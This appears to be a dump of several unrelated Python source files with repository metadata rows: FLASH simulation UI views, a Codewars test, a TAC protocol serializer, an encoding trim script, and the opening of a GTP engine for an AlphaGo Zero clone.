'nuSTS',
'nstepTotalSTS',
]],
['Thread', [
'threadBlockListBuild',
'threadDriverBlockList',
'threadDriverWithinBlock',
'threadRayTraceBuild',
'threadWithinBlockBuild',
]],
['Redshift', [
'zInitial',
'zFinal',
]],
['Other', [
'meshCopyCount',
'sweepOrder',
]],
],
basic=[
'dtinit',
'tmax',
'dtmax',
'dtmin',
'allowDtSTSDominate',
],
)
if 'IO_IOMain' in schema.model:
v.basic.append('IO_IOMain.plotFileIntervalTime')
return v
def _view_physics_Diffuse_DiffuseMain(self, schema):
# http://flash.uchicago.edu/site/flashcode/user_support/rpDoc_4p2.py?submit=rp_Diffuse.txt
v = PKDict(
title='Diffusive Effects',
basic=[
'diff_eleFlMode',
'diff_eleFlCoef',
'dt_diff_factor',
[
['X', [
'diff_eleXlBoundaryType',
'diff_eleXrBoundaryType',
]],
['Y', [
'diff_eleYlBoundaryType',
'diff_eleYrBoundaryType',
]],
['Z', [
'diff_eleZlBoundaryType',
'diff_eleZrBoundaryType',
]]
]
],
)
if 'physics_Diffuse_DiffuseMain_Unsplit' in schema.model:
v.basic.insert(3, 'physics_Diffuse_DiffuseMain_Unsplit.diff_thetaImplct')
if 'physics_Diffuse_DiffuseMain' in schema.model :
v.basic.insert(0, 'physics_Diffuse_DiffuseMain.diff_useEleCond')
v.basic.insert(0, 'physics_Diffuse_DiffuseMain.useDiffuse')
return v
def _view_physics_Gravity_GravityMain(self, schema):
# http://flash.uchicago.edu/site/flashcode/user_support/rpDoc_4p2.py?submit=rp_Gravity.txt
v = PKDict(
basic=[
'useGravity',
],
)
if 'physics_Gravity' in schema.model:
# Flash docs seem to be wrong. useGravity does not exist in
# physics/Gravity. Just physics/Gravity/GravityMain
v.basic.insert(1, 'physics_Gravity.grav_boundary_type')
if 'physics_Gravity_GravityMain_Constant' in schema.model:
v.basic.extend([
'physics_Gravity_GravityMain_Constant.gconst',
'physics_Gravity_GravityMain_Constant.gdirec',
])
return v
def _view_Grid_GridMain(self, schema):
# http://flash.uchicago.edu/site/flashcode/user_support/rpDoc_4p2.py?submit=rp_Grid.txt
v = PKDict(
title='Grid',
basic=[
['Main', [
'geometry',
'eosModeInit',
'eosMode',
[
['X', [
'xl_boundary_type',
'xr_boundary_type',
'xmin',
'xmax'
]],
['Y', [
'yl_boundary_type',
'yr_boundary_type',
'ymin',
'ymax'
]],
['Z', [
'zl_boundary_type',
'zr_boundary_type',
'zmin',
'zmax'
]]
]
]],
],
)
if 'Grid_GridMain_paramesh' in schema.model:
v.basic.append(
['Paramesh', [
'Grid_GridMain_paramesh.nblockx',
'Grid_GridMain_paramesh.nblocky',
'Grid_GridMain_paramesh.nblockz',
'Grid_GridMain_paramesh.lrefine_min',
'Grid_GridMain_paramesh.lrefine_max',
'Grid_GridMain_paramesh.refine_var_count',
[
['Name', [
'Grid_GridMain_paramesh.refine_var_1',
'Grid_GridMain_paramesh.refine_var_2',
'Grid_GridMain_paramesh.refine_var_3',
'Grid_GridMain_paramesh.refine_var_4'
]],
['Refine Cutoff', [
'Grid_GridMain_paramesh.refine_cutoff_1',
'Grid_GridMain_paramesh.refine_cutoff_2',
'Grid_GridMain_paramesh.refine_cutoff_3',
'Grid_GridMain_paramesh.refine_cutoff_4'
]],
['Derefine Cutoff', [
'Grid_GridMain_paramesh.derefine_cutoff_1',
'Grid_GridMain_paramesh.derefine_cutoff_2',
'Grid_GridMain_paramesh.derefine_cutoff_3',
'Grid_GridMain_paramesh.derefine_cutoff_4'
]],
],
]],
)
return v
def _view_physics_Hydro_HydroMain(self, schema):
# http://flash.uchicago.edu/site/flashcode/user_support/rpDoc_4p2.py?submit=rp_Hydro.txt
v = PKDict(
title='Hydrodynamics',
basic=[
'useHydro',
'cfl',
],
fieldsPerTab=10,
)
if 'physics_Hydro_HydroMain_unsplit' in schema.model:
v.basic.extend([
'physics_Hydro_HydroMain_unsplit.order',
'physics_Hydro_HydroMain_unsplit.slopeLimiter',
'physics_Hydro_HydroMain_unsplit.LimitedSlopeBeta',
'physics_Hydro_HydroMain_unsplit.charLimiting',
'physics_Hydro_HydroMain_unsplit.cvisc',
'physics_Hydro_HydroMain_unsplit.RiemannSolver',
'physics_Hydro_HydroMain_unsplit.entropy',
'physics_Hydro_HydroMain_unsplit.shockDetect'
])
return v
def _view_physics_materialProperties_Opacity_OpacityMain_Multispecies(self, schema):
v = PKDict(
title='Material Properties',
basic=[]
)
if 'physics_materialProperties_Opacity_OpacityMain' in schema.model:
v.basic.append('physics_materialProperties_Opacity_OpacityMain.useOpacity')
if 'physics_materialProperties_Conductivity_ConductivityMain' in schema.model:
v.basic.append('physics_materialProperties_Conductivity_ConductivityMain.useConductivity')
if 'physics_materialProperties_MagneticResistivity_MagneticResistivityMain' in schema.model:
v.basic.append('physics_materialProperties_MagneticResistivity_MagneticResistivityMain.useMagneticResistivity')
v.basic.append([])
for s in self._get_species_list(schema):
v.basic[-1].append(
[s.title(), [
f'physics_materialProperties_Opacity_OpacityMain_Multispecies.op_{s}Absorb',
f'physics_materialProperties_Opacity_OpacityMain_Multispecies.op_{s}Emiss',
f'physics_materialProperties_Opacity_OpacityMain_Multispecies.op_{s}Trans',
]],
)
return v
def _view_Multispecies_MultispeciesMain(self, schema):
v = PKDict(
title='Multispecies',
basic=[
[],
],
)
for s in self._get_species_list(schema):
v.basic[-1].append(
[s.title(), [
f'ms_{s}A',
f'ms_{s}Z',
f'ms_{s}ZMin',
f'eos_{s}EosType',
f'eos_{s}SubType',
f'eos_{s}TableFile',
]],
)
return v
def _view_physics_RadTrans_RadTransMain_MGD(self, schema):
# http://flash.uchicago.edu/site/flashcode/user_support/rpDoc_4.py?submit=rp_RadTrans.txt
v = PKDict(
title='Radiative Transfer',
basic=[
['Main', [
'rt_useMGD',
'rt_mgdFlMode',
'rt_mgdFlCoef',
[
['X', [
'rt_mgdXlBoundaryType',
'rt_mgdXrBoundaryType',
]],
['Y', [
'rt_mgdYlBoundaryType',
'rt_mgdYrBoundaryType',
]],
['Z', [
'rt_mgdZlBoundaryType',
'rt_mgdZrBoundaryType',
]],
],
]],
['MGD Groups', [
'rt_mgdNumGroups',
'rt_mgdBounds_1',
'rt_mgdBounds_2',
'rt_mgdBounds_3',
'rt_mgdBounds_4',
'rt_mgdBounds_5',
'rt_mgdBounds_6',
'rt_mgdBounds_7',
]],
],
)
if 'physics_RadTrans_RadTransMain' in schema.model:
v.basic[0][1].insert(0, 'physics_RadTrans_RadTransMain.rt_dtFactor')
v.basic[0][1].insert(0, 'physics_RadTrans_RadTransMain.useRadTrans')
return v
def _view_physics_sourceTerms_EnergyDeposition_EnergyDepositionMain_Laser(self, schema):
# http://flash.uchicago.edu/site/flashcode/user_support/rpDoc_4p22.py?submit=rp_EnergyDeposition.txt
v = PKDict(
title='Energy Deposition - Laser',
basic=[
['Bulk', [
'useEnergyDeposition',
'ed_maxRayCount',
'ed_gradOrder',
'ed_laser3Din2D',
'ed_laser3Din2DwedgeAngle',
'physics_sourceTerms_EnergyDeposition_EnergyDepositionMain_Laser_LaserIO.ed_useLaserIO',
'physics_sourceTerms_EnergyDeposition_EnergyDepositionMain_Laser_LaserIO.ed_laserIOMaxNumberOfPositions',
'physics_sourceTerms_EnergyDeposition_EnergyDepositionMain_Laser_LaserIO.ed_laserIOMaxNumberOfRays',
]],
['Pulse 1', [
'ed_numberOfPulses',
'ed_numberOfSections_1',
[
['Time', [
'ed_time_1_1',
'ed_time_1_2',
'ed_time_1_3',
'ed_time_1_4',
]],
['Power', [
'ed_power_1_1',
'ed_power_1_2',
'ed_power_1_3',
'ed_power_1_4',
]]
]
]],
['Beam 1', [
[
['X', [
'ed_lensX_1',
'ed_targetX_1',
]],
['Y', [
'ed_lensY_1',
'ed_targetY_1',
]],
['Z', [
'ed_lensZ_1',
'ed_targetZ_1',
]]
],
'ed_numberOfBeams',
'ed_lensSemiAxisMajor_1',
'ed_crossSectionFunctionType_1',
'ed_numberOfRays_1',
'ed_pulseNumber_1',
'ed_wavelength_1',
'ed_gridType_1',
'ed_gridnRadialTics_1',
'ed_gaussianExponent_1',
[
['Major', [
'ed_gaussianRadiusMajor_1',
'ed_gaussianCenterMajor_1',
'ed_targetSemiAxisMajor_1',
'ed_semiAxisMajorTorsionAngle_1',
'ed_semiAxisMajorTorsionAxis_1',
]],
['Minor', [
'ed_gaussianRadiusMinor_1',
'ed_gaussianCenterMinor_1',
'ed_targetSemiAxisMinor_1',
]],
],
]],
],
)
return v
def _view_physics_sourceTerms_Flame_FlameMain(self, schema):
# TODO(e-carlin): add _LABELS for things
# http://flash.uchicago.edu/site/flashcode/user_support/rpDoc_4p2.py?submit=rp_Flame.txt
v = PKDict(
basic=[
'useFlame',
'fl_epsilon_0',
'fl_epsilon_1',
'fl_kpp_fact',
'fl_b',
],
)
if 'physics_sourceTerms_Flame_FlameEffects_EIP' in schema.model:
v.basic.extend([
[
['Unburned', [
'physics_sourceTerms_Flame_FlameEffects_EIP.ye_unburned',
'physics_sourceTerms_Flame_FlameEffects_EIP.sumyi_unburned',
]],
['Burned', [
'physics_sourceTerms_Flame_FlameEffects_EIP.ye_burned',
'physics_sourceTerms_Flame_FlameEffects_EIP.sumyi_burned',
]],
],
'physics_sourceTerms_Flame_FlameEffects_EIP.flame_deltae',
])
if 'physics_sourceTerms_Flame_FlameSpeed_Constant' in schema.model:
v.basic.append('physics_sourceTerms_Flame_FlameSpeed_Constant.fl_fsConstFlameSpeed')
return v
def _view_Simulation_SimulationMain_flashApp(self, schema):
if 'sim_condWall' in schema.model.Simulation_SimulationMain_flashApp:
#TODO(pjm): special views for cap laser, instead look for common species fields
return PKDict(
title='FLASH Simulation',
basic=[
'sim_condWall',
'sim_peakField',
'sim_period',
'sim_zminWall',
[
['Fill', [
'sim_eosFill',
'sim_rhoFill',
'sim_teleFill',
'sim_tionFill',
'sim_tradFill',
]],
['Wall', [
'sim_eosWall',
'sim_rhoWall',
'sim_teleWall',
'sim_tionWall',
'sim_tradWall',
]],
],
],
)
return PKDict(
title='FLASH Simulation',
basic=schema.view.Simulation_SimulationMain_flashApp.advanced,
advanced=[]
)
| 39.884164 | 125 | 0.500607 | 2,375 | 27,201 | 5.433684 | 0.221895 | 0.005114 | 0.020147 | 0.013018 | 0.256102 | 0.180473 | 0.126463 | 0.083688 | 0.056102 | 0.049593 | 0 | 0.012176 | 0.405206 | 27,201 | 681 | 126 | 39.942731 | 0.785463 | 0.052351 | 0 | 0.212361 | 0 | 0.001585 | 0.314083 | 0.137603 | 0 | 0 | 0 | 0.001468 | 0.007924 | 1 | 0.034865 | false | 0 | 0.007924 | 0.001585 | 0.077655 | 0.001585 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2f235270cb6f9f5b537966a86b660e1348d1bfa | 3,484 | py | Python | kyu_6/color_choice/test_checkchoose.py | pedrocodacyorg2/codewars | ba3ea81125b6082d867f0ae34c6c9be15e153966 | [
"Unlicense"
] | 1 | 2022-02-12T05:56:04.000Z | 2022-02-12T05:56:04.000Z | kyu_6/color_choice/test_checkchoose.py | pedrocodacyorg2/codewars | ba3ea81125b6082d867f0ae34c6c9be15e153966 | [
"Unlicense"
] | 182 | 2020-04-30T00:51:36.000Z | 2021-09-07T04:15:05.000Z | kyu_6/color_choice/test_checkchoose.py | pedrocodacyorg2/codewars | ba3ea81125b6082d867f0ae34c6c9be15e153966 | [
"Unlicense"
] | 4 | 2020-04-29T22:04:20.000Z | 2021-07-13T20:04:14.000Z | # Created by Egor Kostan.
# GitHub: https://github.com/ikostan
# LinkedIn: https://www.linkedin.com/in/egor-kostan/
# FUNDAMENTALS
import allure
import unittest
from utils.log_func import print_log
from kyu_6.color_choice.checkchoose import checkchoose
@allure.epic('6 kyu')
@allure.parent_suite('Novice')
@allure.suite("Fundamentals")
@allure.sub_suite("Unit Tests")
@allure.feature("Factorial")
@allure.story('Color Choice')
@allure.tag('FUNDAMENTALS')
@allure.link(url='https://www.codewars.com/kata/55be10de92aad5ef28000023/train/python',
name='Source/Kata')
class CheckchooseTestCase(unittest.TestCase):
"""
Testing checkchoose function
"""
def test_checkchoose(self):
"""
In mathematics the number of x combinations you can take from a
set of n elements is called the binomial coefficient of n and x,
or more often n choose x. The formula to compute m = n choose x is:
m = n! / (x! * (n - x)!) where ! is the factorial operator.
You are a renowned poster designer and painter. You are asked to
provide 6 posters all having the same design each in 2 colors.
Posters must all have a different color combination and you have
the choice of 4 colors: red, blue, yellow, green. How many colors
can you choose for each poster?
"""
allure.dynamic.title("Testing checkchoose function")
allure.dynamic.severity(allure.severity_level.NORMAL)
allure.dynamic.description_html('<h3>Codewars badge:</h3>'
'<img src="https://www.codewars.com/users/myFirstCode'
'/badges/large">'
'<h3>Test Description:</h3>'
"<p>Knowing m (number of posters to design), knowing n "
"(total number of available colors), let us search x "
"(number of colors for each poster so that each poster "
"has a unique combination of colors and the number of "
"combinations is exactly the same as the number of posters). "
"In other words we must find x such as n choose x = m (1) "
"for a given m and a given n; m >= 0 and n > 0. If many x "
"are solutions give as result the smallest x. It can happen "
"that when m is given at random there are no x satisfying "
"equation (1) then return -1.</p>")
test_data = (
(6, 4, 2),
(4, 4, 1),
(4, 2, -1),
(35, 7, 3),
(36, 7, -1),
(1, 6, 0),
(1, 15, 0),
(2, 12, -1),
(75788358475481302186, 87, -1),
)
        for m, n, expected in test_data:
result = checkchoose(m, n)
with allure.step("Pass m: {}, "
"n: {} and assert the "
"result: {} vs "
"expected: {}".format(m, n, result, expected)):
print_log(m=m, n=n, result=result, expected=expected)
self.assertEqual(expected, result)
| 41.975904 | 102 | 0.516648 | 412 | 3,484 | 4.339806 | 0.432039 | 0.026846 | 0.018456 | 0.021253 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038821 | 0.386338 | 3,484 | 82 | 103 | 42.487805 | 0.797474 | 0.202067 | 0 | 0 | 0 | 0 | 0.330217 | 0 | 0 | 0 | 0 | 0 | 0.037736 | 1 | 0.018868 | false | 0.018868 | 0.075472 | 0 | 0.113208 | 0.037736 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2f3a271aa7f1a6b6b2929add330dd33a42c44e8 | 13,442 | py | Python | packages/protocols/tac/serialization.py | 8ball030/agents-aea | fcf470e3daa9bd8e272ca66542c6003feb0fd7a8 | [
"Apache-2.0"
] | 1 | 2021-07-25T18:50:18.000Z | 2021-07-25T18:50:18.000Z | packages/protocols/tac/serialization.py | 8ball030/agents-aea | fcf470e3daa9bd8e272ca66542c6003feb0fd7a8 | [
"Apache-2.0"
] | null | null | null | packages/protocols/tac/serialization.py | 8ball030/agents-aea | fcf470e3daa9bd8e272ca66542c6003feb0fd7a8 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""Serialization for the TAC protocol."""
import sys
from typing import Any, Dict, TYPE_CHECKING
from aea.protocols.base import Message
from aea.protocols.base import Serializer
if TYPE_CHECKING or "pytest" in sys.modules:
from packages.protocols.tac import tac_pb2
from packages.protocols.tac.message import TACMessage
else:
import tac_protocol.tac_pb2 as tac_pb2 # pragma: no cover
from tac_protocol.message import TACMessage # pragma: no cover
def _from_dict_to_pairs(d):
"""Convert a flat dictionary into a list of StrStrPair or StrIntPair."""
result = []
items = sorted(d.items(), key=lambda pair: pair[0])
for key, value in items:
if type(value) == int:
pair = tac_pb2.StrIntPair()
elif type(value) == str:
pair = tac_pb2.StrStrPair()
elif type(value) == float:
pair = tac_pb2.StrFloatPair()
else:
raise ValueError("Either 'int' or 'str' or 'float', not {}".format(type(value)))
pair.first = key
pair.second = value
result.append(pair)
return result
def _from_pairs_to_dict(pairs):
"""Convert a list of StrStrPair or StrIntPair or StrFloatPair into a flat dictionary."""
result = {}
for pair in pairs:
key = pair.first
value = pair.second
result[key] = value
return result
class TACSerializer(Serializer):
"""Serialization for the TAC protocol."""
def encode(self, msg: Message) -> bytes:
"""
        Encode the message.
:param msg: the message object
:return: the bytes
"""
tac_type = TACMessage.Type(msg.get("type"))
tac_container = tac_pb2.TACMessage()
if tac_type == TACMessage.Type.REGISTER:
agent_name = msg.get("agent_name")
tac_msg = tac_pb2.TACAgent.Register() # type: ignore
tac_msg.agent_name = agent_name
tac_container.register.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.UNREGISTER:
tac_msg = tac_pb2.TACAgent.Unregister() # type: ignore
tac_container.unregister.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.TRANSACTION:
tac_msg = tac_pb2.TACAgent.Transaction() # type: ignore
tac_msg.transaction_id = msg.get("transaction_id")
tac_msg.counterparty = msg.get("counterparty")
tac_msg.amount_by_currency.extend(_from_dict_to_pairs(msg.get("amount_by_currency")))
tac_msg.sender_tx_fee = msg.get("sender_tx_fee")
tac_msg.counterparty_tx_fee = msg.get("counterparty_tx_fee")
tac_msg.quantities_by_good_pbk.extend(_from_dict_to_pairs(msg.get("quantities_by_good_pbk")))
tac_container.transaction.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.GET_STATE_UPDATE:
tac_msg = tac_pb2.TACAgent.GetStateUpdate() # type: ignore
tac_container.get_state_update.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.CANCELLED:
tac_msg = tac_pb2.TACController.Cancelled() # type: ignore
tac_container.cancelled.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.GAME_DATA:
tac_msg = tac_pb2.TACController.GameData() # type: ignore
tac_msg.amount_by_currency.extend(_from_dict_to_pairs(msg.get("amount_by_currency")))
tac_msg.exchange_params_by_currency.extend(_from_dict_to_pairs(msg.get("exchange_params_by_currency")))
tac_msg.quantities_by_good_pbk.extend(_from_dict_to_pairs(msg.get("quantities_by_good_pbk")))
tac_msg.utility_params_by_good_pbk.extend(_from_dict_to_pairs(msg.get("utility_params_by_good_pbk")))
tac_msg.tx_fee = msg.get("tx_fee")
tac_msg.agent_pbk_to_name.extend(_from_dict_to_pairs(msg.get("agent_pbk_to_name")))
tac_msg.good_pbk_to_name.extend(_from_dict_to_pairs(msg.get("good_pbk_to_name")))
tac_msg.version_id = msg.get("version_id")
tac_container.game_data.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.TRANSACTION_CONFIRMATION:
tac_msg = tac_pb2.TACController.TransactionConfirmation() # type: ignore
tac_msg.transaction_id = msg.get("transaction_id")
tac_msg.amount_by_currency.extend(_from_dict_to_pairs(msg.get("amount_by_currency")))
tac_msg.quantities_by_good_pbk.extend(_from_dict_to_pairs(msg.get("quantities_by_good_pbk")))
tac_container.transaction_confirmation.CopyFrom(tac_msg)
# elif tac_type == TACMessage.Type.STATE_UPDATE:
# tac_msg = tac_pb2.TACController.StateUpdate() # type: ignore
# game_data_json = msg.get("game_data")
# game_data = tac_pb2.TACController.GameData() # type: ignore
# game_data.amount_by_currency.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["amount_by_currency"]))) # type: ignore
# game_data.exchange_params_by_currency.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["exchange_params_by_currency"]))) # type: ignore
# game_data.quantities_by_good_pbk.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["quantities_by_good_pbk"]))) # type: ignore
# game_data.utility_params_by_good_pbk.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["utility_params_by_good_pbk"]))) # type: ignore
# game_data.tx_fee = game_data_json["tx_fee"] # type: ignore
# game_data.agent_pbk_to_name.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["agent_pbk_to_name"]))) # type: ignore
# game_data.good_pbk_to_name.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["good_pbk_to_name"]))) # type: ignore
# tac_msg.initial_state.CopyFrom(game_data)
# transactions = []
# msg_transactions = cast(List[Any], msg.get("transactions"))
# for t in msg_transactions:
# tx = tac_pb2.TACAgent.Transaction() # type: ignore
# tx.transaction_id = t.get("transaction_id")
# tx.counterparty = t.get("counterparty")
# tx.amount_by_currency.extend(_from_dict_to_pairs(t.get("amount_by_currency")))
# tx.sender_tx_fee = t.get("sender_tx_fee")
# tx.counterparty_tx_fee = t.get("counterparty_tx_fee")
# tx.quantities_by_good_pbk.extend(_from_dict_to_pairs(t.get("quantities_by_good_pbk")))
# transactions.append(tx)
# tac_msg.txs.extend(transactions)
# tac_container.state_update.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.TAC_ERROR:
tac_msg = tac_pb2.TACController.Error() # type: ignore
tac_msg.error_code = TACMessage.ErrorCode(msg.get("error_code")).value
if msg.is_set("error_msg"):
tac_msg.error_msg = msg.get("error_msg")
if msg.is_set("details"):
tac_msg.details.update(msg.get("details"))
tac_container.error.CopyFrom(tac_msg)
else:
raise ValueError("Type not recognized: {}.".format(tac_type))
tac_message_bytes = tac_container.SerializeToString()
return tac_message_bytes
def decode(self, obj: bytes) -> Message:
"""
Decode the message.
:param obj: the bytes object
:return: the message
"""
tac_container = tac_pb2.TACMessage()
tac_container.ParseFromString(obj)
new_body = {} # type: Dict[str, Any]
tac_type = tac_container.WhichOneof("content")
if tac_type == "register":
new_body["type"] = TACMessage.Type.REGISTER
new_body["agent_name"] = tac_container.register.agent_name
elif tac_type == "unregister":
new_body["type"] = TACMessage.Type.UNREGISTER
elif tac_type == "transaction":
new_body["type"] = TACMessage.Type.TRANSACTION
new_body["transaction_id"] = tac_container.transaction.transaction_id
new_body["counterparty"] = tac_container.transaction.counterparty
new_body["amount_by_currency"] = _from_pairs_to_dict(tac_container.transaction.amount_by_currency)
new_body["sender_tx_fee"] = tac_container.transaction.sender_tx_fee
new_body["counterparty_tx_fee"] = tac_container.transaction.counterparty_tx_fee
new_body["quantities_by_good_pbk"] = _from_pairs_to_dict(tac_container.transaction.quantities_by_good_pbk)
elif tac_type == "get_state_update":
new_body["type"] = TACMessage.Type.GET_STATE_UPDATE
elif tac_type == "cancelled":
new_body["type"] = TACMessage.Type.CANCELLED
elif tac_type == "game_data":
new_body["type"] = TACMessage.Type.GAME_DATA
new_body["amount_by_currency"] = _from_pairs_to_dict(tac_container.game_data.amount_by_currency)
new_body["exchange_params_by_currency"] = _from_pairs_to_dict(tac_container.game_data.exchange_params_by_currency)
new_body["quantities_by_good_pbk"] = _from_pairs_to_dict(tac_container.game_data.quantities_by_good_pbk)
new_body["utility_params_by_good_pbk"] = _from_pairs_to_dict(tac_container.game_data.utility_params_by_good_pbk)
new_body["tx_fee"] = tac_container.game_data.tx_fee
new_body["agent_pbk_to_name"] = _from_pairs_to_dict(tac_container.game_data.agent_pbk_to_name)
new_body["good_pbk_to_name"] = _from_pairs_to_dict(tac_container.game_data.good_pbk_to_name)
new_body["version_id"] = tac_container.game_data.version_id
elif tac_type == "transaction_confirmation":
new_body["type"] = TACMessage.Type.TRANSACTION_CONFIRMATION
new_body["transaction_id"] = tac_container.transaction_confirmation.transaction_id
new_body["amount_by_currency"] = _from_pairs_to_dict(tac_container.transaction_confirmation.amount_by_currency)
new_body["quantities_by_good_pbk"] = _from_pairs_to_dict(tac_container.transaction_confirmation.quantities_by_good_pbk)
# elif tac_type == "state_update":
# new_body["type"] = TACMessage.Type.STATE_UPDATE
# game_data = dict(
# amount_by_currency=_from_pairs_to_dict(tac_container.state_update.game_data.amount_by_currency),
# exchange_params_by_currency=_from_pairs_to_dict(tac_container.state_update.game_data.exchange_params_by_currency),
# quantities_by_good_pbk=_from_pairs_to_dict(tac_container.state_update.game_data.quantities_by_good_pbk),
# utility_params_by_good_pbk=_from_pairs_to_dict(tac_container.state_update.game_data.utility_params_by_good_pbk),
# tx_fee=tac_container.state_update.game_data.tx_fee,
# agent_pbk_to_name=_from_pairs_to_dict(tac_container.state_update.game_data.agent_pbk_to_name),
# good_pbk_to_name=_from_pairs_to_dict(tac_container.state_update.game_data.good_pbk_to_name),
# version_id=tac_container.state_update.game_data.version_id
# )
# new_body["game_data"] = game_data
# transactions = []
# for transaction in tac_container.state_update.transactions:
# tx_json = dict(
# transaction_id=transaction.transaction_id,
# counterparty=transaction.counterparty,
# amount_by_currency=_from_pairs_to_dict(transaction.amount_by_currency),
# sender_tx_fee=transaction.sender_tx_fee,
# counterparty_tx_fee=transaction.counterparty_tx_fee,
# quantities_by_good_pbk=_from_pairs_to_dict(transaction.quantities_by_good_pbk),
# )
# transactions.append(tx_json)
# new_body["transactions"] = transactions
elif tac_type == "error":
new_body["type"] = TACMessage.Type.TAC_ERROR
new_body["error_code"] = TACMessage.ErrorCode(tac_container.error.error_code)
if tac_container.error.error_msg:
new_body["error_msg"] = tac_container.error.error_msg
if tac_container.error.details:
new_body["details"] = dict(tac_container.error.details)
else:
raise ValueError("Type not recognized.")
tac_type = TACMessage.Type(new_body["type"])
new_body["type"] = tac_type
tac_message = TACMessage(tac_type=tac_type, body=new_body)
return tac_message
| 54.865306 | 164 | 0.669618 | 1,728 | 13,442 | 4.80787 | 0.10706 | 0.066442 | 0.030332 | 0.045739 | 0.569572 | 0.455344 | 0.36856 | 0.316442 | 0.285508 | 0.25674 | 0 | 0.003156 | 0.222214 | 13,442 | 244 | 165 | 55.090164 | 0.791487 | 0.349204 | 0 | 0.115108 | 0 | 0 | 0.106179 | 0.030604 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028777 | false | 0 | 0.057554 | 0 | 0.122302 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2f681aa0c27c6fee045207209eb0d085f1d4754 | 266 | py | Python | Miscellaneous groups/[sakuraba]/Completed/ac_PromareBD_01_B.py | tuilakhanh/Encoding-Projects | 8b254913457cb28e7d0890ad6b974d0d8f0cbecc | [
"MIT"
] | 57 | 2019-01-31T17:32:46.000Z | 2022-03-23T05:46:51.000Z | Miscellaneous groups/[sakuraba]/Completed/ac_PromareBD_01_B.py | tuilakhanh/Encoding-Projects | 8b254913457cb28e7d0890ad6b974d0d8f0cbecc | [
"MIT"
] | null | null | null | Miscellaneous groups/[sakuraba]/Completed/ac_PromareBD_01_B.py | tuilakhanh/Encoding-Projects | 8b254913457cb28e7d0890ad6b974d0d8f0cbecc | [
"MIT"
] | 12 | 2019-04-30T06:16:13.000Z | 2022-03-14T16:15:07.000Z | #!/usr/bin/env python3
import acsuite as acs
import lvsfunc as lvf
ac = acs.AC()
path = r'G:/src/PROMARE/BDMV/STREAM/00000-02.mkv'
src = lvf.src(path)
if __name__ == "__main__":
ac.eztrim(src, [(600, -24)], path[:-4]+"_Track03.wav", "PromareBD_01_B_cut.wav")
| 22.166667 | 84 | 0.672932 | 46 | 266 | 3.630435 | 0.73913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.077922 | 0.131579 | 266 | 11 | 85 | 24.181818 | 0.645022 | 0.078947 | 0 | 0 | 0 | 0 | 0.331967 | 0.25 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2f73da5f0b431ca3202f939fe112d9c748dfe83 | 3,570 | py | Python | gtp.py | daoqiclub/alphagozero | 211b84b5437bd58e426f49058c8897fef354ba18 | [
"MIT"
] | 65 | 2017-10-30T15:55:07.000Z | 2021-11-11T14:03:01.000Z | gtp.py | daoqiclub/alphagozero | 211b84b5437bd58e426f49058c8897fef354ba18 | [
"MIT"
] | 16 | 2017-11-03T02:05:16.000Z | 2019-12-17T08:14:53.000Z | gtp.py | daoqiclub/alphagozero | 211b84b5437bd58e426f49058c8897fef354ba18 | [
"MIT"
] | 22 | 2017-11-03T02:03:46.000Z | 2022-02-20T13:33:32.000Z | #!/usr/bin/env python
import sys
from conf import conf
from play import game_init
from engine import ModelEngine, COLOR_TO_PLAYER
from model import load_best_model
import string
import os
from __init__ import __version__
SIZE = conf['SIZE']
class Engine(object):
def __init__(self, model, logfile):
self.board, self.player = game_init()
self.start_engine(model)
self.logfile = logfile
def start_engine(self, model):
self.engine = ModelEngine(model, conf['MCTS_SIMULATIONS'], self.board)
def name(self):
return "AlphaGoZero Python - {} - {} simulations".format(self.engine.model.name, conf['MCTS_SIMULATIONS'])
def version(self):
return __version__
def protocol_version(self):
return "2"
def list_commands(self):
return ""
